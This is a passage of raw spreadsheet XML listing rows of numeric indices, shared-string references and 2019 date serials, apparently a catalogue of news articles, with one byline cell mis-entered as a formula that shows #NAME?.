      <c r="C16640" t="s">
        <v>25497</v>
      </c>
      <c r="D16640" s="1">
        <v>43684</v>
      </c>
      <c r="E16640" t="s">
        <v>27633</v>
      </c>
      <c r="F16640" t="s">
        <v>10021</v>
      </c>
      <c r="G16640" t="s">
        <v>27634</v>
      </c>
    </row>
    <row r="16641" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16641">
        <f t="shared" si="259"/>
        <v>16640</v>
      </c>
      <c r="B16641">
        <v>1640</v>
      </c>
      <c r="C16641" t="s">
        <v>25497</v>
      </c>
      <c r="D16641" s="1">
        <v>43679</v>
      </c>
      <c r="E16641" t="s">
        <v>25614</v>
      </c>
      <c r="F16641" t="s">
        <v>9975</v>
      </c>
      <c r="G16641" t="s">
        <v>27635</v>
      </c>
    </row>
    <row r="16642" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16642">
        <f t="shared" si="259"/>
        <v>16641</v>
      </c>
      <c r="B16642">
        <v>1641</v>
      </c>
      <c r="C16642" t="s">
        <v>25497</v>
      </c>
      <c r="D16642" s="1">
        <v>43700</v>
      </c>
      <c r="E16642" t="s">
        <v>27636</v>
      </c>
      <c r="F16642" t="s">
        <v>9975</v>
      </c>
      <c r="G16642" t="s">
        <v>27637</v>
      </c>
    </row>
    <row r="16643" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16643">
        <f t="shared" ref="A16643:A16706" si="260">+ROW(A16642)</f>
        <v>16642</v>
      </c>
      <c r="B16643">
        <v>1642</v>
      </c>
      <c r="C16643" t="s">
        <v>25497</v>
      </c>
      <c r="D16643" s="1">
        <v>43687</v>
      </c>
      <c r="F16643" t="s">
        <v>9975</v>
      </c>
      <c r="G16643" t="s">
        <v>27638</v>
      </c>
    </row>
    <row r="16644" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16644">
        <f t="shared" si="260"/>
        <v>16643</v>
      </c>
      <c r="B16644">
        <v>1643</v>
      </c>
      <c r="C16644" t="s">
        <v>25497</v>
      </c>
      <c r="D16644" s="1">
        <v>43708</v>
      </c>
      <c r="E16644" t="s">
        <v>27072</v>
      </c>
      <c r="F16644" t="s">
        <v>9975</v>
      </c>
      <c r="G16644" t="s">
        <v>27639</v>
      </c>
    </row>
    <row r="16645" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16645">
        <f t="shared" si="260"/>
        <v>16644</v>
      </c>
      <c r="B16645">
        <v>1644</v>
      </c>
      <c r="C16645" t="s">
        <v>25497</v>
      </c>
      <c r="D16645" s="1">
        <v>43702</v>
      </c>
      <c r="E16645" t="s">
        <v>26022</v>
      </c>
      <c r="F16645" t="s">
        <v>9975</v>
      </c>
      <c r="G16645" t="s">
        <v>27640</v>
      </c>
    </row>
    <row r="16646" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16646">
        <f t="shared" si="260"/>
        <v>16645</v>
      </c>
      <c r="B16646">
        <v>1645</v>
      </c>
      <c r="C16646" t="s">
        <v>25497</v>
      </c>
      <c r="D16646" s="1">
        <v>43685</v>
      </c>
      <c r="F16646" t="s">
        <v>9975</v>
      </c>
      <c r="G16646" t="s">
        <v>25521</v>
      </c>
    </row>
    <row r="16647" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16647">
        <f t="shared" si="260"/>
        <v>16646</v>
      </c>
      <c r="B16647">
        <v>1646</v>
      </c>
      <c r="C16647" t="s">
        <v>25497</v>
      </c>
      <c r="D16647" s="1">
        <v>43689</v>
      </c>
      <c r="F16647" t="s">
        <v>9975</v>
      </c>
      <c r="G16647" t="s">
        <v>27641</v>
      </c>
    </row>
    <row r="16648" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16648">
        <f t="shared" si="260"/>
        <v>16647</v>
      </c>
      <c r="B16648">
        <v>1647</v>
      </c>
      <c r="C16648" t="s">
        <v>25497</v>
      </c>
      <c r="D16648" s="1">
        <v>43697</v>
      </c>
      <c r="E16648" t="s">
        <v>26142</v>
      </c>
      <c r="F16648" t="s">
        <v>9975</v>
      </c>
      <c r="G16648" t="s">
        <v>27642</v>
      </c>
    </row>
    <row r="16649" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16649">
        <f t="shared" si="260"/>
        <v>16648</v>
      </c>
      <c r="B16649">
        <v>1648</v>
      </c>
      <c r="C16649" t="s">
        <v>25497</v>
      </c>
      <c r="D16649" s="1">
        <v>43683</v>
      </c>
      <c r="E16649" t="s">
        <v>25543</v>
      </c>
      <c r="F16649" t="s">
        <v>9975</v>
      </c>
      <c r="G16649" t="s">
        <v>27643</v>
      </c>
    </row>
    <row r="16650" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16650">
        <f t="shared" si="260"/>
        <v>16649</v>
      </c>
      <c r="B16650">
        <v>1649</v>
      </c>
      <c r="C16650" t="s">
        <v>25497</v>
      </c>
      <c r="D16650" s="1">
        <v>43698</v>
      </c>
      <c r="E16650" t="s">
        <v>26174</v>
      </c>
      <c r="F16650" t="s">
        <v>9975</v>
      </c>
      <c r="G16650" t="s">
        <v>27644</v>
      </c>
    </row>
    <row r="16651" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16651">
        <f t="shared" si="260"/>
        <v>16650</v>
      </c>
      <c r="B16651">
        <v>1650</v>
      </c>
      <c r="C16651" t="s">
        <v>25497</v>
      </c>
      <c r="D16651" s="1">
        <v>43706</v>
      </c>
      <c r="E16651" t="s">
        <v>25517</v>
      </c>
      <c r="F16651" t="s">
        <v>9975</v>
      </c>
      <c r="G16651" t="s">
        <v>27645</v>
      </c>
    </row>
    <row r="16652" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16652">
        <f t="shared" si="260"/>
        <v>16651</v>
      </c>
      <c r="B16652">
        <v>1651</v>
      </c>
      <c r="C16652" t="s">
        <v>25497</v>
      </c>
      <c r="D16652" s="1">
        <v>43691</v>
      </c>
      <c r="E16652" t="s">
        <v>26750</v>
      </c>
      <c r="F16652" t="s">
        <v>9975</v>
      </c>
      <c r="G16652" t="s">
        <v>27646</v>
      </c>
    </row>
    <row r="16653" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16653">
        <f t="shared" si="260"/>
        <v>16652</v>
      </c>
      <c r="B16653">
        <v>1652</v>
      </c>
      <c r="C16653" t="s">
        <v>25497</v>
      </c>
      <c r="D16653" s="1">
        <v>43683</v>
      </c>
      <c r="F16653" t="s">
        <v>9975</v>
      </c>
      <c r="G16653" t="s">
        <v>27647</v>
      </c>
    </row>
    <row r="16654" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16654">
        <f t="shared" si="260"/>
        <v>16653</v>
      </c>
      <c r="B16654">
        <v>1653</v>
      </c>
      <c r="C16654" t="s">
        <v>25497</v>
      </c>
      <c r="D16654" s="1">
        <v>43706</v>
      </c>
      <c r="E16654" t="s">
        <v>25895</v>
      </c>
      <c r="F16654" t="s">
        <v>9975</v>
      </c>
      <c r="G16654" t="s">
        <v>27648</v>
      </c>
    </row>
    <row r="16655" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16655">
        <f t="shared" si="260"/>
        <v>16654</v>
      </c>
      <c r="B16655">
        <v>1654</v>
      </c>
      <c r="C16655" t="s">
        <v>25497</v>
      </c>
      <c r="D16655" s="1">
        <v>43691</v>
      </c>
      <c r="F16655" t="s">
        <v>10021</v>
      </c>
      <c r="G16655" t="s">
        <v>27649</v>
      </c>
    </row>
    <row r="16656" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16656">
        <f t="shared" si="260"/>
        <v>16655</v>
      </c>
      <c r="B16656">
        <v>1655</v>
      </c>
      <c r="C16656" t="s">
        <v>25497</v>
      </c>
      <c r="D16656" s="1">
        <v>43699</v>
      </c>
      <c r="F16656" t="s">
        <v>9975</v>
      </c>
      <c r="G16656" t="s">
        <v>27650</v>
      </c>
    </row>
    <row r="16657" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16657">
        <f t="shared" si="260"/>
        <v>16656</v>
      </c>
      <c r="B16657">
        <v>1656</v>
      </c>
      <c r="C16657" t="s">
        <v>25497</v>
      </c>
      <c r="D16657" s="1">
        <v>43705</v>
      </c>
      <c r="F16657" t="s">
        <v>9975</v>
      </c>
      <c r="G16657" t="s">
        <v>27651</v>
      </c>
    </row>
    <row r="16658" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16658">
        <f t="shared" si="260"/>
        <v>16657</v>
      </c>
      <c r="B16658">
        <v>1657</v>
      </c>
      <c r="C16658" t="s">
        <v>25497</v>
      </c>
      <c r="D16658" s="1">
        <v>43683</v>
      </c>
      <c r="E16658" t="s">
        <v>26975</v>
      </c>
      <c r="F16658" t="s">
        <v>9975</v>
      </c>
      <c r="G16658" t="s">
        <v>27652</v>
      </c>
    </row>
    <row r="16659" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16659">
        <f t="shared" si="260"/>
        <v>16658</v>
      </c>
      <c r="B16659">
        <v>1658</v>
      </c>
      <c r="C16659" t="s">
        <v>25497</v>
      </c>
      <c r="D16659" s="1">
        <v>43685</v>
      </c>
      <c r="E16659" t="s">
        <v>25642</v>
      </c>
      <c r="F16659" t="s">
        <v>9975</v>
      </c>
      <c r="G16659" t="s">
        <v>27653</v>
      </c>
    </row>
    <row r="16660" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16660">
        <f t="shared" si="260"/>
        <v>16659</v>
      </c>
      <c r="B16660">
        <v>1659</v>
      </c>
      <c r="C16660" t="s">
        <v>25497</v>
      </c>
      <c r="D16660" s="1">
        <v>43706</v>
      </c>
      <c r="E16660" t="s">
        <v>27654</v>
      </c>
      <c r="F16660" t="s">
        <v>9975</v>
      </c>
      <c r="G16660" t="s">
        <v>27655</v>
      </c>
    </row>
    <row r="16661" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16661">
        <f t="shared" si="260"/>
        <v>16660</v>
      </c>
      <c r="B16661">
        <v>1660</v>
      </c>
      <c r="C16661" t="s">
        <v>25497</v>
      </c>
      <c r="D16661" s="1">
        <v>43704</v>
      </c>
      <c r="E16661" t="s">
        <v>27656</v>
      </c>
      <c r="F16661" t="s">
        <v>9975</v>
      </c>
      <c r="G16661" t="s">
        <v>27657</v>
      </c>
    </row>
    <row r="16662" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16662">
        <f t="shared" si="260"/>
        <v>16661</v>
      </c>
      <c r="B16662">
        <v>1661</v>
      </c>
      <c r="C16662" t="s">
        <v>25497</v>
      </c>
      <c r="D16662" s="1">
        <v>43706</v>
      </c>
      <c r="E16662" t="s">
        <v>27658</v>
      </c>
      <c r="F16662" t="s">
        <v>9975</v>
      </c>
      <c r="G16662" t="s">
        <v>27659</v>
      </c>
    </row>
    <row r="16663" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16663">
        <f t="shared" si="260"/>
        <v>16662</v>
      </c>
      <c r="B16663">
        <v>1662</v>
      </c>
      <c r="C16663" t="s">
        <v>25497</v>
      </c>
      <c r="D16663" s="1">
        <v>43679</v>
      </c>
      <c r="E16663" t="s">
        <v>27660</v>
      </c>
      <c r="F16663" t="s">
        <v>10021</v>
      </c>
      <c r="G16663" t="s">
        <v>27661</v>
      </c>
    </row>
    <row r="16664" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16664">
        <f t="shared" si="260"/>
        <v>16663</v>
      </c>
      <c r="B16664">
        <v>1663</v>
      </c>
      <c r="C16664" t="s">
        <v>25497</v>
      </c>
      <c r="D16664" s="1">
        <v>43694</v>
      </c>
      <c r="E16664" t="s">
        <v>27662</v>
      </c>
      <c r="F16664" t="s">
        <v>9975</v>
      </c>
      <c r="G16664" t="s">
        <v>27663</v>
      </c>
    </row>
    <row r="16665" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16665">
        <f t="shared" si="260"/>
        <v>16664</v>
      </c>
      <c r="B16665">
        <v>1664</v>
      </c>
      <c r="C16665" t="s">
        <v>25497</v>
      </c>
      <c r="D16665" s="1">
        <v>43705</v>
      </c>
      <c r="E16665" t="s">
        <v>27664</v>
      </c>
      <c r="F16665" t="s">
        <v>9975</v>
      </c>
      <c r="G16665" t="s">
        <v>27665</v>
      </c>
    </row>
    <row r="16666" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16666">
        <f t="shared" si="260"/>
        <v>16665</v>
      </c>
      <c r="B16666">
        <v>1665</v>
      </c>
      <c r="C16666" t="s">
        <v>25497</v>
      </c>
      <c r="D16666" s="1">
        <v>43683</v>
      </c>
      <c r="F16666" t="s">
        <v>9975</v>
      </c>
      <c r="G16666" t="s">
        <v>27666</v>
      </c>
    </row>
    <row r="16667" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16667">
        <f t="shared" si="260"/>
        <v>16666</v>
      </c>
      <c r="B16667">
        <v>1666</v>
      </c>
      <c r="C16667" t="s">
        <v>25497</v>
      </c>
      <c r="D16667" s="1">
        <v>43707</v>
      </c>
      <c r="F16667" t="s">
        <v>9978</v>
      </c>
      <c r="G16667" t="s">
        <v>27667</v>
      </c>
    </row>
    <row r="16668" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16668">
        <f t="shared" si="260"/>
        <v>16667</v>
      </c>
      <c r="B16668">
        <v>1667</v>
      </c>
      <c r="C16668" t="s">
        <v>25497</v>
      </c>
      <c r="D16668" s="1">
        <v>43699</v>
      </c>
      <c r="E16668" t="s">
        <v>25517</v>
      </c>
      <c r="F16668" t="s">
        <v>9975</v>
      </c>
      <c r="G16668" t="s">
        <v>27668</v>
      </c>
    </row>
    <row r="16669" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16669">
        <f t="shared" si="260"/>
        <v>16668</v>
      </c>
      <c r="B16669">
        <v>1668</v>
      </c>
      <c r="C16669" t="s">
        <v>25497</v>
      </c>
      <c r="D16669" s="1">
        <v>43696</v>
      </c>
      <c r="E16669" t="s">
        <v>25642</v>
      </c>
      <c r="F16669" t="s">
        <v>9975</v>
      </c>
      <c r="G16669" t="s">
        <v>27669</v>
      </c>
    </row>
    <row r="16670" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16670">
        <f t="shared" si="260"/>
        <v>16669</v>
      </c>
      <c r="B16670">
        <v>1669</v>
      </c>
      <c r="C16670" t="s">
        <v>25497</v>
      </c>
      <c r="D16670" s="1">
        <v>43693</v>
      </c>
      <c r="E16670" t="s">
        <v>25592</v>
      </c>
      <c r="F16670" t="s">
        <v>9975</v>
      </c>
      <c r="G16670" t="s">
        <v>27670</v>
      </c>
    </row>
    <row r="16671" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16671">
        <f t="shared" si="260"/>
        <v>16670</v>
      </c>
      <c r="B16671">
        <v>1670</v>
      </c>
      <c r="C16671" t="s">
        <v>25497</v>
      </c>
      <c r="D16671" s="1">
        <v>43693</v>
      </c>
      <c r="E16671" t="s">
        <v>27671</v>
      </c>
      <c r="F16671" t="s">
        <v>9975</v>
      </c>
      <c r="G16671" t="s">
        <v>27672</v>
      </c>
    </row>
    <row r="16672" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16672">
        <f t="shared" si="260"/>
        <v>16671</v>
      </c>
      <c r="B16672">
        <v>1671</v>
      </c>
      <c r="C16672" t="s">
        <v>25497</v>
      </c>
      <c r="D16672" s="1">
        <v>43679</v>
      </c>
      <c r="F16672" t="s">
        <v>9975</v>
      </c>
      <c r="G16672" t="s">
        <v>27673</v>
      </c>
    </row>
    <row r="16673" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16673">
        <f t="shared" si="260"/>
        <v>16672</v>
      </c>
      <c r="B16673">
        <v>1672</v>
      </c>
      <c r="C16673" t="s">
        <v>25497</v>
      </c>
      <c r="D16673" s="1">
        <v>43702</v>
      </c>
      <c r="F16673" t="s">
        <v>9978</v>
      </c>
      <c r="G16673" t="s">
        <v>27674</v>
      </c>
    </row>
    <row r="16674" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16674">
        <f t="shared" si="260"/>
        <v>16673</v>
      </c>
      <c r="B16674">
        <v>1673</v>
      </c>
      <c r="C16674" t="s">
        <v>25497</v>
      </c>
      <c r="D16674" s="1">
        <v>43689</v>
      </c>
      <c r="E16674" t="s">
        <v>27675</v>
      </c>
      <c r="F16674" t="s">
        <v>9975</v>
      </c>
      <c r="G16674" t="s">
        <v>27676</v>
      </c>
    </row>
    <row r="16675" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16675">
        <f t="shared" si="260"/>
        <v>16674</v>
      </c>
      <c r="B16675">
        <v>1674</v>
      </c>
      <c r="C16675" t="s">
        <v>25497</v>
      </c>
      <c r="D16675" s="1">
        <v>43681</v>
      </c>
      <c r="E16675" t="s">
        <v>27677</v>
      </c>
      <c r="F16675" t="s">
        <v>9975</v>
      </c>
      <c r="G16675" t="s">
        <v>27678</v>
      </c>
    </row>
    <row r="16676" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16676">
        <f t="shared" si="260"/>
        <v>16675</v>
      </c>
      <c r="B16676">
        <v>1675</v>
      </c>
      <c r="C16676" t="s">
        <v>25497</v>
      </c>
      <c r="D16676" s="1">
        <v>43696</v>
      </c>
      <c r="E16676" t="s">
        <v>25592</v>
      </c>
      <c r="F16676" t="s">
        <v>9975</v>
      </c>
      <c r="G16676" t="s">
        <v>27679</v>
      </c>
    </row>
    <row r="16677" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16677">
        <f t="shared" si="260"/>
        <v>16676</v>
      </c>
      <c r="B16677">
        <v>1676</v>
      </c>
      <c r="C16677" t="s">
        <v>25497</v>
      </c>
      <c r="D16677" s="1">
        <v>43707</v>
      </c>
      <c r="E16677" t="s">
        <v>25517</v>
      </c>
      <c r="F16677" t="s">
        <v>9975</v>
      </c>
      <c r="G16677" t="s">
        <v>27680</v>
      </c>
    </row>
    <row r="16678" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16678">
        <f t="shared" si="260"/>
        <v>16677</v>
      </c>
      <c r="B16678">
        <v>1677</v>
      </c>
      <c r="C16678" t="s">
        <v>25497</v>
      </c>
      <c r="D16678" s="1">
        <v>43703</v>
      </c>
      <c r="F16678" t="s">
        <v>10526</v>
      </c>
      <c r="G16678" t="s">
        <v>27681</v>
      </c>
    </row>
    <row r="16679" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16679">
        <f t="shared" si="260"/>
        <v>16678</v>
      </c>
      <c r="B16679">
        <v>1678</v>
      </c>
      <c r="C16679" t="s">
        <v>25497</v>
      </c>
      <c r="D16679" s="1">
        <v>43684</v>
      </c>
      <c r="E16679" t="s">
        <v>25517</v>
      </c>
      <c r="F16679" t="s">
        <v>9975</v>
      </c>
      <c r="G16679" t="s">
        <v>27682</v>
      </c>
    </row>
    <row r="16680" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16680">
        <f t="shared" si="260"/>
        <v>16679</v>
      </c>
      <c r="B16680">
        <v>1679</v>
      </c>
      <c r="C16680" t="s">
        <v>25497</v>
      </c>
      <c r="D16680" s="1">
        <v>43701</v>
      </c>
      <c r="F16680" t="s">
        <v>9975</v>
      </c>
      <c r="G16680" t="s">
        <v>27683</v>
      </c>
    </row>
    <row r="16681" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16681">
        <f t="shared" si="260"/>
        <v>16680</v>
      </c>
      <c r="B16681">
        <v>1680</v>
      </c>
      <c r="C16681" t="s">
        <v>25497</v>
      </c>
      <c r="D16681" s="1">
        <v>43700</v>
      </c>
      <c r="E16681" t="e">
        <f>- By By Ethan Baron the Mercury News</f>
        <v>#NAME?</v>
      </c>
      <c r="F16681" t="s">
        <v>9975</v>
      </c>
      <c r="G16681" t="s">
        <v>27684</v>
      </c>
    </row>
    <row r="16682" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16682">
        <f t="shared" si="260"/>
        <v>16681</v>
      </c>
      <c r="B16682">
        <v>1681</v>
      </c>
      <c r="C16682" t="s">
        <v>25497</v>
      </c>
      <c r="D16682" s="1">
        <v>43707</v>
      </c>
      <c r="F16682" t="s">
        <v>9975</v>
      </c>
      <c r="G16682" t="s">
        <v>27685</v>
      </c>
    </row>
    <row r="16683" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16683">
        <f t="shared" si="260"/>
        <v>16682</v>
      </c>
      <c r="B16683">
        <v>1682</v>
      </c>
      <c r="C16683" t="s">
        <v>25497</v>
      </c>
      <c r="D16683" s="1">
        <v>43683</v>
      </c>
      <c r="E16683" t="s">
        <v>27686</v>
      </c>
      <c r="F16683" t="s">
        <v>9978</v>
      </c>
      <c r="G16683" t="s">
        <v>27687</v>
      </c>
    </row>
    <row r="16684" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16684">
        <f t="shared" si="260"/>
        <v>16683</v>
      </c>
      <c r="B16684">
        <v>1683</v>
      </c>
      <c r="C16684" t="s">
        <v>25497</v>
      </c>
      <c r="D16684" s="1">
        <v>43684</v>
      </c>
      <c r="E16684" t="s">
        <v>27688</v>
      </c>
      <c r="F16684" t="s">
        <v>10021</v>
      </c>
      <c r="G16684" t="s">
        <v>27689</v>
      </c>
    </row>
    <row r="16685" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16685">
        <f t="shared" si="260"/>
        <v>16684</v>
      </c>
      <c r="B16685">
        <v>1684</v>
      </c>
      <c r="C16685" t="s">
        <v>25497</v>
      </c>
      <c r="D16685" s="1">
        <v>43700</v>
      </c>
      <c r="F16685" t="s">
        <v>9975</v>
      </c>
      <c r="G16685" t="s">
        <v>27690</v>
      </c>
    </row>
    <row r="16686" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16686">
        <f t="shared" si="260"/>
        <v>16685</v>
      </c>
      <c r="B16686">
        <v>1685</v>
      </c>
      <c r="C16686" t="s">
        <v>25497</v>
      </c>
      <c r="D16686" s="1">
        <v>43678</v>
      </c>
      <c r="E16686" t="s">
        <v>27691</v>
      </c>
      <c r="F16686" t="s">
        <v>9975</v>
      </c>
      <c r="G16686" t="s">
        <v>27692</v>
      </c>
    </row>
    <row r="16687" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16687">
        <f t="shared" si="260"/>
        <v>16686</v>
      </c>
      <c r="B16687">
        <v>1686</v>
      </c>
      <c r="C16687" t="s">
        <v>25497</v>
      </c>
      <c r="D16687" s="1">
        <v>43705</v>
      </c>
      <c r="F16687" t="s">
        <v>9975</v>
      </c>
      <c r="G16687" t="s">
        <v>27693</v>
      </c>
    </row>
    <row r="16688" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16688">
        <f t="shared" si="260"/>
        <v>16687</v>
      </c>
      <c r="B16688">
        <v>1687</v>
      </c>
      <c r="C16688" t="s">
        <v>25497</v>
      </c>
      <c r="D16688" s="1">
        <v>43689</v>
      </c>
      <c r="E16688" t="s">
        <v>25592</v>
      </c>
      <c r="F16688" t="s">
        <v>9975</v>
      </c>
      <c r="G16688" t="s">
        <v>27694</v>
      </c>
    </row>
    <row r="16689" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16689">
        <f t="shared" si="260"/>
        <v>16688</v>
      </c>
      <c r="B16689">
        <v>1688</v>
      </c>
      <c r="C16689" t="s">
        <v>25497</v>
      </c>
      <c r="D16689" s="1">
        <v>43703</v>
      </c>
      <c r="E16689" t="s">
        <v>25512</v>
      </c>
      <c r="F16689" t="s">
        <v>9975</v>
      </c>
      <c r="G16689" t="s">
        <v>27695</v>
      </c>
    </row>
    <row r="16690" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16690">
        <f t="shared" si="260"/>
        <v>16689</v>
      </c>
      <c r="B16690">
        <v>1689</v>
      </c>
      <c r="C16690" t="s">
        <v>25497</v>
      </c>
      <c r="D16690" s="1">
        <v>43705</v>
      </c>
      <c r="F16690" t="s">
        <v>9975</v>
      </c>
      <c r="G16690" t="s">
        <v>27696</v>
      </c>
    </row>
    <row r="16691" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16691">
        <f t="shared" si="260"/>
        <v>16690</v>
      </c>
      <c r="B16691">
        <v>1690</v>
      </c>
      <c r="C16691" t="s">
        <v>25497</v>
      </c>
      <c r="D16691" s="1">
        <v>43678</v>
      </c>
      <c r="F16691" t="s">
        <v>9975</v>
      </c>
      <c r="G16691" t="s">
        <v>27697</v>
      </c>
    </row>
    <row r="16692" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16692">
        <f t="shared" si="260"/>
        <v>16691</v>
      </c>
      <c r="B16692">
        <v>1691</v>
      </c>
      <c r="C16692" t="s">
        <v>25497</v>
      </c>
      <c r="D16692" s="1">
        <v>43697</v>
      </c>
      <c r="E16692" t="s">
        <v>25543</v>
      </c>
      <c r="F16692" t="s">
        <v>9975</v>
      </c>
      <c r="G16692" t="s">
        <v>27698</v>
      </c>
    </row>
    <row r="16693" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16693">
        <f t="shared" si="260"/>
        <v>16692</v>
      </c>
      <c r="B16693">
        <v>1692</v>
      </c>
      <c r="C16693" t="s">
        <v>25497</v>
      </c>
      <c r="D16693" s="1">
        <v>43692</v>
      </c>
      <c r="E16693" t="s">
        <v>27699</v>
      </c>
      <c r="F16693" t="s">
        <v>9975</v>
      </c>
      <c r="G16693" t="s">
        <v>27700</v>
      </c>
    </row>
    <row r="16694" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16694">
        <f t="shared" si="260"/>
        <v>16693</v>
      </c>
      <c r="B16694">
        <v>1693</v>
      </c>
      <c r="C16694" t="s">
        <v>25497</v>
      </c>
      <c r="D16694" s="1">
        <v>43696</v>
      </c>
      <c r="E16694" t="s">
        <v>27701</v>
      </c>
      <c r="F16694" t="s">
        <v>9975</v>
      </c>
      <c r="G16694" t="s">
        <v>27702</v>
      </c>
    </row>
    <row r="16695" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16695">
        <f t="shared" si="260"/>
        <v>16694</v>
      </c>
      <c r="B16695">
        <v>1694</v>
      </c>
      <c r="C16695" t="s">
        <v>25497</v>
      </c>
      <c r="D16695" s="1">
        <v>43695</v>
      </c>
      <c r="E16695" t="s">
        <v>27703</v>
      </c>
      <c r="F16695" t="s">
        <v>9975</v>
      </c>
      <c r="G16695" t="s">
        <v>27704</v>
      </c>
    </row>
    <row r="16696" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16696">
        <f t="shared" si="260"/>
        <v>16695</v>
      </c>
      <c r="B16696">
        <v>1695</v>
      </c>
      <c r="C16696" t="s">
        <v>25497</v>
      </c>
      <c r="D16696" s="1">
        <v>43700</v>
      </c>
      <c r="E16696" t="s">
        <v>27705</v>
      </c>
      <c r="F16696" t="s">
        <v>10021</v>
      </c>
      <c r="G16696" t="s">
        <v>27706</v>
      </c>
    </row>
    <row r="16697" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16697">
        <f t="shared" si="260"/>
        <v>16696</v>
      </c>
      <c r="B16697">
        <v>1696</v>
      </c>
      <c r="C16697" t="s">
        <v>25497</v>
      </c>
      <c r="D16697" s="1">
        <v>43698</v>
      </c>
      <c r="F16697" t="s">
        <v>9975</v>
      </c>
      <c r="G16697" t="s">
        <v>27707</v>
      </c>
    </row>
    <row r="16698" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16698">
        <f t="shared" si="260"/>
        <v>16697</v>
      </c>
      <c r="B16698">
        <v>1697</v>
      </c>
      <c r="C16698" t="s">
        <v>25497</v>
      </c>
      <c r="D16698" s="1">
        <v>43696</v>
      </c>
      <c r="E16698" t="s">
        <v>25502</v>
      </c>
      <c r="F16698" t="s">
        <v>9975</v>
      </c>
      <c r="G16698" t="s">
        <v>27708</v>
      </c>
    </row>
    <row r="16699" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16699">
        <f t="shared" si="260"/>
        <v>16698</v>
      </c>
      <c r="B16699">
        <v>1698</v>
      </c>
      <c r="C16699" t="s">
        <v>25497</v>
      </c>
      <c r="D16699" s="1">
        <v>43690</v>
      </c>
      <c r="E16699" t="s">
        <v>27709</v>
      </c>
      <c r="F16699" t="s">
        <v>9975</v>
      </c>
      <c r="G16699" t="s">
        <v>27710</v>
      </c>
    </row>
    <row r="16700" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16700">
        <f t="shared" si="260"/>
        <v>16699</v>
      </c>
      <c r="B16700">
        <v>1699</v>
      </c>
      <c r="C16700" t="s">
        <v>25497</v>
      </c>
      <c r="D16700" s="1">
        <v>43693</v>
      </c>
      <c r="F16700" t="s">
        <v>9975</v>
      </c>
      <c r="G16700" t="s">
        <v>27711</v>
      </c>
    </row>
    <row r="16701" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16701">
        <f t="shared" si="260"/>
        <v>16700</v>
      </c>
      <c r="B16701">
        <v>1700</v>
      </c>
      <c r="C16701" t="s">
        <v>25497</v>
      </c>
      <c r="D16701" s="1">
        <v>43694</v>
      </c>
      <c r="E16701" t="s">
        <v>27712</v>
      </c>
      <c r="F16701" t="s">
        <v>10526</v>
      </c>
      <c r="G16701" t="s">
        <v>27713</v>
      </c>
    </row>
    <row r="16702" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16702">
        <f t="shared" si="260"/>
        <v>16701</v>
      </c>
      <c r="B16702">
        <v>1701</v>
      </c>
      <c r="C16702" t="s">
        <v>25497</v>
      </c>
      <c r="D16702" s="1">
        <v>43682</v>
      </c>
      <c r="E16702" t="s">
        <v>26857</v>
      </c>
      <c r="F16702" t="s">
        <v>10526</v>
      </c>
      <c r="G16702" t="s">
        <v>27714</v>
      </c>
    </row>
    <row r="16703" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16703">
        <f t="shared" si="260"/>
        <v>16702</v>
      </c>
      <c r="B16703">
        <v>1702</v>
      </c>
      <c r="C16703" t="s">
        <v>25497</v>
      </c>
